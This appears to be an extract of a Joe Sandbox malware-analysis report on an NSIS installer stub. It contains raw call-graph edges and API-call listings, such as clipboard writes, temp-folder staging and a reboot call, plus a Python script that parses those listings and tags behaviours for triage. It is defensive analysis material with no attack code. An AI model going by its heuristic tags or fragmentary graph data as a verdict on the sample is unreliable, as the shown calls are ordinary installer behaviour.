5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 
5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 
5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 
5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 
5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                            Control-flow Graph (rendered in the report as a graph image; node labels summarised here, edges and the Executed/Not Executed colouring omitted)
                                                                            Routine 004050cd-00405474: GetDlgItem (three times), GetClientRect, GetSystemMetrics and a series of SendMessageW calls; ShowWindow; GetDlgItem, CreateThread and CloseHandle; CreatePopupMenu, AppendMenuW, GetWindowRect and TrackPopupMenu; then OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, a SendMessageW loop, GlobalUnlock, SetClipboardData and CloseClipboard. Subcalls: 00403d98, 00404476, 00406805, 004062a3, 00403dca, 00403d3f, 00403d18, 00404f72.
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                            • GetClientRect.USER32(?,?), ref: 00405196
                                                                            • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                              • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                            • ShowWindow.USER32(00000000), ref: 004052E7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                            • ShowWindow.USER32(00000008), ref: 00405333
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                            • CreatePopupMenu.USER32 ref: 00405376
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                            • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                            • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                            • EmptyClipboard.USER32 ref: 00405411
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                            • CloseClipboard.USER32 ref: 0040546E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                            • String ID: @rD$New install of "%s" to "%s"${
                                                                            • API String ID: 2110491804-2409696222
                                                                            • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                            • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                            • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                            • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                            Control-flow Graph (rendered in the report as a graph image; node labels summarised here, edges and the Executed/Not Executed colouring omitted)
                                                                            Routine 00403883-00403c5f: COMCTL32 ordinal #17, SetErrorMode, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW and CharNextW; GetTempPathW, then either directly or after GetWindowsDirectoryW and lstrcatW, DeleteFileW; lstrcatW and lstrcmpiW; CreateDirectoryW and SetCurrentDirectoryW; DeleteFileW, CopyFileW and CloseHandle; GetCurrentProcess; ExitWindowsEx; CoUninitialize and ExitProcess. Subcalls: 004062fc, 00406009, 00405d06, 004037cc, 00403587, 00403859, 00405ca0, 0040592c, 004060e7, 00403800, 00407d6e, 0040677e, 00406805, 00406c68, 00405c3f, 0040141d.
                                                                            APIs
                                                                            • #17.COMCTL32 ref: 004038A2
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                            • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                              • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                              • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                              • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                            • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                            • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                            • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                            • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                            • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                            • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                            • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                            • ExitProcess.KERNEL32 ref: 00403AF1
                                                                            • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                            • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                            • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                            • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                            • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                            • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                            • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                            • API String ID: 2435955865-239407132
                                                                            • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                            • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                            • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                            • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
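The API listings on this page (one `Api.MODULE(args), ref: address` line per call, with `Part of subcall function` marking calls reached through a callee) are a usable triage input on their own. The Python parser below is an added example, not part of the Joe Sandbox report or of the NSIS stub it describes: it turns such lines into records, decodes the few argument constants worth reading by eye (ExitWindowsEx flags, SetErrorMode flags, the GlobalAlloc and TrackPopupMenu flag words, the clipboard format, and the list-view and progress-bar message numbers), and tags behaviour combinations such as staging a copy under the temp directory or writing the clipboard. The constant names are the documented Win32/commctrl values; the capability rule set is my own and not a Joe Sandbox signature; the embedded sample lines are copied from the listings above.

```python
# Added example: parse Joe Sandbox "APIs" listing lines and decode the arguments that
# matter for triage. Not part of the report or of NSIS; the rule set below is my own.
import re
from dataclasses import dataclass
from typing import List, Optional

# One "APIs" entry:  Api.MODULE(args), ref: 0040XXXX   (the "(args)" part may be absent).
# The args group is greedy so parentheses inside string arguments survive.
API_LINE = re.compile(r"^(?P<api>[#\w]+)\.(?P<mod>[A-Z0-9]+)"
                      r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
SUBCALL = re.compile(r"^Part of subcall function ([0-9A-Fa-f]{8}):\s*(.*)$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Documented Win32 / commctrl constants for the arguments worth reading at triage time.
EWX = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE", 0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
SEM = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX",
       0x4: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}
GMEM = {0x2: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT"}
TPM = {0x80: "TPM_NONOTIFY", 0x100: "TPM_RETURNCMD"}
CF = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}
MSG = {0x401: "PBM_SETRANGE", 0x409: "PBM_SETBARCOLOR", 0x2001: "PBM_SETBKCOLOR",
       0x1001: "LVM_SETBKCOLOR", 0x1004: "LVM_GETITEMCOUNT", 0x1024: "LVM_SETTEXTCOLOR",
       0x1026: "LVM_SETTEXTBKCOLOR", 0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE",
       0x1061: "LVM_INSERTCOLUMNW", 0x1073: "LVM_GETITEMTEXTW"}
# Behaviour tags (my own rules, not a Joe Sandbox signature): every listed API must appear.
RULES = {"clipboard-write": {"OpenClipboard", "EmptyClipboard", "SetClipboardData"},
         "reboot-or-shutdown": {"ExitWindowsEx"},
         "temp-dir-staging": {"GetTempPathW", "CreateDirectoryW", "CopyFileW"},
         "dynamic-api-resolution": {"LoadLibraryA", "GetProcAddress"}}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                   # address of the call site (the "ref:" value)
    subcall_of: Optional[int]  # routine named in "Part of subcall function", if any


def parse_api_line(line: str) -> Optional[ApiCall]:
    text = line.strip().lstrip("•").strip()
    sub, m = None, SUBCALL.match(text)
    if m:
        sub, text = int(m.group(1), 16), m.group(2)
    m = API_LINE.match(text)
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [a.strip() for a in raw.split(",")]
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub)


def parse_report(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]


def flags(value: int, table: dict, zero: str = "0") -> str:
    names = [name for bit, name in table.items() if value & bit == bit]
    return "|".join(names) if names else zero


def hexarg(call: ApiCall, i: int) -> Optional[int]:  # Joe prints '?' for unknown values
    if i < len(call.args) and HEX8.match(call.args[i]):
        return int(call.args[i], 16)
    return None


DECODERS = {  # api -> (argument index, decoder for that argument)
    "ExitWindowsEx": (0, lambda v: flags(v, EWX, "EWX_LOGOFF")),
    "SetErrorMode": (0, lambda v: flags(v, SEM)),
    "GlobalAlloc": (0, lambda v: flags(v, GMEM)),
    "TrackPopupMenu": (1, lambda v: flags(v, TPM)),
    "SetClipboardData": (0, lambda v: CF.get(v, hex(v))),
    "SendMessageW": (1, lambda v: MSG.get(v, hex(v))),
}


def decode(call: ApiCall) -> str:
    """Name the constant in the argument that matters for triage; '' if nothing to decode."""
    idx, fn = DECODERS.get(call.api, (0, None))
    value = hexarg(call, idx) if fn else None
    return "" if value is None else fn(value)


def capabilities(calls: List[ApiCall]) -> List[str]:
    seen = {c.api for c in calls}
    return sorted(tag for tag, needed in RULES.items() if needed <= seen)


# Sample input: lines copied verbatim from the API listings on this page.
SAMPLE = """\
• SetErrorMode.KERNELBASE(00008001), ref: 004038AD
  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
• GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
• CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
• CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
• OpenClipboard.USER32(00000000), ref: 0040540B
• EmptyClipboard.USER32 ref: 00405411
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
• SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
• SetClipboardData.USER32(0000000D,00000000), ref: 00405468
"""
```

Paste an APIs block from a report into `parse_report()` and pass the result to `decode()` per call and `capabilities()` for the whole routine. On the sample, ExitWindowsEx decodes to EWX_REBOOT, SetErrorMode to SEM_FAILCRITICALERRORS|SEM_NOOPENFILEERRORBOX, GlobalAlloc to GMEM_MOVEABLE|GMEM_ZEROINIT, SetClipboardData to CF_UNICODETEXT and the SendMessageW to LVM_GETITEMTEXTW, and all four tags fire. Only arguments the report shows as a full 8-digit hex value are decoded; a `?` or a string argument is kept as text.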

                                                                            Control-flow Graph (rendered in the report as a graph image; node labels summarised here, edges and the Executed/Not Executed colouring omitted)
                                                                            Routine 004074bb-00407cf6: the only imported calls named in the graph are GlobalFree at 004073c2 and 0040743a and GlobalAlloc at 004073cb and 00407443; no other block carries an API call.
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                            • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                            • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                            • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                            • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                            • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                            • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                            • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                            • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                            • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                            • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                            Control-flow Graph (graph image not reproduced; basic blocks 405479-405929, API calls listed below)
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                            • ShowWindow.USER32(?), ref: 004054D2
                                                                            • DestroyWindow.USER32 ref: 004054E6
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                            • GetDlgItem.USER32(?,?), ref: 00405523
